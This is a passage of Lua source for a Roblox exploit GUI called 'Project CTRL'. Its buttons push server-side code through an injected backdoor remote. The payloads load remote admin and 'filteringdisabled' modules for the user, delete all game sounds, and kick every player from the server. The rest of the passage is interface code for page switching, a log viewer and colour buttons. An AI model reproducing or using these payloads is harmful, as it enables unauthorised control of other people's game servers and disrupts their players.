	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(7634392335)("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_60);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_64()
local script = G2L["64"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(75026282232818).load("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_64);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_68()
local script = G2L["68"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(70681531110549).admin("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_68);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_6c()
local script = G2L["6c"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(10304477576).AntiSkid()'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_6c);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_70()
local script = G2L["70"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = [[for _, obj in ipairs(game:GetDescendants()) do
		if obj:IsA("Sound") then
		obj:Destroy()
		end
		end
		]]
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_70);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_74()
local script = G2L["74"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = [[for i,v player in ipairs(game.Players:GetDescendants()) do
		v:Kick("This server has been shut down")
		end
		]]
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_74);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_78()
local script = G2L["78"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(9978015219).filteringdisabled("' .. username .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_78);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_7c()
local script = G2L["7c"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = ' require(14499140823)("' .. username .. '", "sorcerer")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_7c);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_80()
local script = G2L["80"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(2823974237).giveGuns' .. username .. ''
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_80);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_84()
local script = G2L["84"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(104732504345735).jumpscare("' .. username .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_84);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_88()
local script = G2L["88"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(104712588684071)("' .. username .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_88);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_8c()
local script = G2L["8c"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(6036737823).CrackedByIncreaseron("' .. username .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_8c);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_90()
local script = G2L["90"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = true
		script.Parent.Parent.page2.Visible = false
		script.Parent.Parent.page3.Visible = false
		script.Parent.Parent.page4.Visible = false
		script.Parent.Parent.page5.Visible = false
	end)
end;
task.spawn(C_90);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_93()
local script = G2L["93"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = false
		script.Parent.Parent.page2.Visible = true
		script.Parent.Parent.page3.Visible = false
		script.Parent.Parent.page4.Visible = false
		script.Parent.Parent.page5.Visible = false
	end)
end;
task.spawn(C_93);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_96()
local script = G2L["96"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = false
		script.Parent.Parent.page2.Visible = false
		script.Parent.Parent.page3.Visible = true
		script.Parent.Parent.page4.Visible = false
		script.Parent.Parent.page5.Visible = false
	end)
end;
task.spawn(C_96);
-- StarterGui.ScreenGui.Frame.page4.ScrollingFrame.LocalScript
local function C_9a()
local script = G2L["9a"];
	local scrollingFrame = script.Parent
	local LogService = game:GetService("LogService")
	
	-- Format time
	local function getTimeStamp()
		local t = os.date("*t")
		return string.format("%02d:%02d:%02d", t.hour, t.min, t.sec)
	end
	
	-- Create a new label for each log line
	local function addLogLine(text, color)
		local label = Instance.new("TextLabel")
		label.Name = "LOG"
		label.Text = text
		label.TextColor3 = color
		label.BackgroundTransparency = 1
		label.Font = Enum.Font.Code
		label.TextSize = 14
		label.TextWrapped = true
		label.Size = UDim2.new(1, -10, 0, 0)
		label.AutomaticSize = Enum.AutomaticSize.Y
		label.Parent = scrollingFrame
		
		-- Apply default UIStroke
		local stroke = Instance.new("UIStroke")
		stroke.Parent = label
	end
	
	-- Listen to all console output
	LogService.MessageOut:Connect(function(message, messageType)
		if message == "Hello world!" then return end --  Skip exact match
		
		local timestamp = getTimeStamp()
		local color = Color3.fromRGB(255, 255, 255)
		
		if messageType == Enum.MessageType.MessageWarning then
			color = Color3.fromRGB(255, 217, 0)
		elseif messageType == Enum.MessageType.MessageError then
			color = Color3.fromRGB(179, 0, 0)
		end
		
		local fullText = "[" .. timestamp .. "] " .. message
		addLogLine(fullText, color)
	end)
end;
task.spawn(C_9a);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_9d()
local script = G2L["9d"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = false
		script.Parent.Parent.page2.Visible = false
		script.Parent.Parent.page3.Visible = false
		script.Parent.Parent.page4.Visible = true
		script.Parent.Parent.page5.Visible = false
	end)
end;
task.spawn(C_9d);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_a9()
local script = G2L["a9"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(84, 84, 84)
	end)
end;
task.spawn(C_a9);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_ad()
local script = G2L["ad"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
	end)
end;
task.spawn(C_ad);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_b1()
local script = G2L["b1"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
	end)
end;
task.spawn(C_b1);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_b5()
local script = G2L["b5"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(85, 255, 0)
	end)
end;
task.spawn(C_b5);
-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
local function C_b9()
local script = G2L["b9"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = false
		script.Parent.Parent.page2.Visible = false
		script.Parent.Parent.page3.Visible = false
		script.Parent.Parent.page4.Visible = false
		script.Parent.Parent.page5.Visible = true
	end)
end;
task.spawn(C_b9);

return G2L["1"], require;
